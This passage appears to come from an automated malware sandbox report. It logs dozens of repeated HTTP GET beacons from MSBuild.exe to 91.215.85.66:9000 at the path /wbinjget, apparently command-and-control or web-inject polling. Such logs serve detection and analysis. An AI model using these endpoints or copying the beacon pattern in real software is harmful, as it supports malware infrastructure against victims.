17	192.168.2.4	49771	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:51.260587931 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:27:51.536638021 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:50 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49772	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:51.939220905 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:27:52.222294092 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:51 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49773	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:52.633126974 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:27:53.317980051 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:27:53.557327032 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:51 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49775	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:53.950098991 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:27:54.239891052 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:54 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49776	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:54.638901949 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:27:54.919522047 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:54 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49777	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:55.311311007 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:27:55.605038881 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:55 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49778	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:56.004878044 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:27:56.291382074 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:55 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49780	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:56.691935062 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:27:56.978425980 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:56 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49781	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:57.379589081 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:27:57.662031889 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:57 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49782	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:58.039962053 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:27:58.319533110 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:57 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49783	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:58.712817907 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:27:58.998074055 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:58 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49784	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:27:59.389162064 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:27:59.668585062 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:59 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49785	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:00.056181908 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:00.347325087 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:27:59 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49786	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:00.734263897 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:01.013287067 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:00 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49787	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:01.410435915 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:01.699625015 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:01 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49788	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:02.129184961 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:02.410413980 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:01 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49789	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:02.817257881 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:03.126393080 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:02 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49790	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:03.538079977 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:03.825433016 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:02 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49791	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:04.219615936 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:04.497415066 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:04 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49792	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:05.175048113 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:05.452749014 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:05 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49793	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:07.399509907 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:07.679058075 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:07 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49794	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:08.080276966 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:08.367175102 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:07 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49795	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:08.757766962 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:09.039999962 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:08 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49796	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:09.426389933 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:10.019598007 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:09 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49797	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:10.451445103 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:10.728935957 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:09 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49798	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:11.121275902 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:11.398252010 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:10 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49799	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:11.795387983 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:12.076651096 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:11 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49800	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:12.467315912 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:12.748790026 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:11 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49801	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:13.129302979 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:13.406492949 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:12 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49802	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:13.808298111 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:14.085562944 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:12 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49803	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:14.511167049 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:14.797960997 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:14 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49804	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:15.199882984 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:15.487790108 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:15 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49805	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:15.888230085 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:16.174185991 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:15 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49806	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:16.564404011 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 26, 2024 10:28:16.839325905 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:16 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49807	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:17.231858969 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 26, 2024 10:28:17.511218071 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 08:28:17 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49808	91.215.85.66	9000	7092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:28:17.892915010 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
